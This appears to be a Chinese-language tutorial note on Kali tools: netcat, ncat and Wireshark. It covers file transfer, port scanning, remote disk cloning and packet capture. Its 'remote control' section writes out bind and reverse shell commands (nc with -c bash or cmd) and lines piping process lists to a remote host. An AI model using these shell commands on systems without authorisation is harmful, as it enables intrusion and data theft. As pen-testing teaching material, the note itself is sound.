Kali工具介绍
NETCAT——NC
- 网络工具中的瑞士军刀
- 侦听模式/传输模式
- 取代telnet/获取banner信息
- 传输文本信息
- 传输文件/目录
- 加密传输文件
- 远程控制/木马
- 加密流量(默认不加密)
- 流媒体服务器
- 远程克隆硬盘
nc -nv 1.1.1.1 80
nc -l -p 4444 监听端口(服务器端) nc -nv 1.1.1.1 4444 连接端口(客户端) (只支持双方,第三方再去连接会被refuse)
ls -l | nc -nv 1.1.1.1 333
ps aux | nc -nv 1.1.1.1 333 -q 1
传输文件
nc -lp 333 > 1.mp4
nc -nv 1.1.1.1 333 < 2.mp4 -q 1
或
nc -q 1 -lp 333 < a.mp4
nc -nv 1.1.1.1 333 > 2.mp4
传输目录
tar -cvf - music/ | nc -lp 333 -q 1
nc -nv 1.1.1.1 333 | tar -xvf -
(也可以用文件重定向的方式)
加密传文件
nc -lp 333 | mcrypt —flush -Fbqd -a rijndael -256 -m ecb > 1.mp4
mcrypt —flush -Fbq -a rijndael -256 -m ecb < a.pm4 | nc -nv 1.1.1.1 333 -q 1
(使用其它任意加密工具都可以,nc本身不能加密)
端口扫描
nc -nvz 1.1.1.1 1-65535
nc -nvzu 1.1.1.1 1-1024 (UDP mode)
远程克隆硬盘
(备份/远程电子取证,可以将目标服务器硬盘远程复制,或者内存)
nc -lp 333 | dd of =/dev/sdb
dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
远程控制
正向:
nc -lp 333 -c bash (eg: -c bash or -c /bin/sh)
nc 1.1.1.1 333
反向:
nc -lp 333
nc 1.1.1.1 333 -c bash
(windows下把bash换成cmd)
NC缺点
- 缺乏加密
- 缺乏访问控制
- 不同操作系统对nc的版本不同,相应指令也不同
Ncat
为了弥补nc的缺乏加密、缺乏访问控制而开发出来的工具。 Ncat包含于nmap工具包中
ncat -c bash —allow 192.168.23.130 -vnl 333 —ssl
ncat -nv 192.168.23.136 333 —ssl
WireShark
抓包引擎
- Libpcap9——Linux
- Winpcap10——Windows
解码能力:衡量一个抓包器的优良的重要指标
(对各种协议的分析解码能力)
非混杂模式:凡是不是发给本机IP地址(选定的网卡对应的IP地址)的包是不会抓取的
混杂模式:经过网卡的所有流量都会嗅探到
过滤器
过滤规则—略
常见协议包
略
信息统计
Statistics 中的一些选项用于处理统计数据包信息
解码方式
wireshark默认根据端口来选择解码方式,但是对于一个端口上跑的服务可能改变,此时需要右键数据包 Decode As…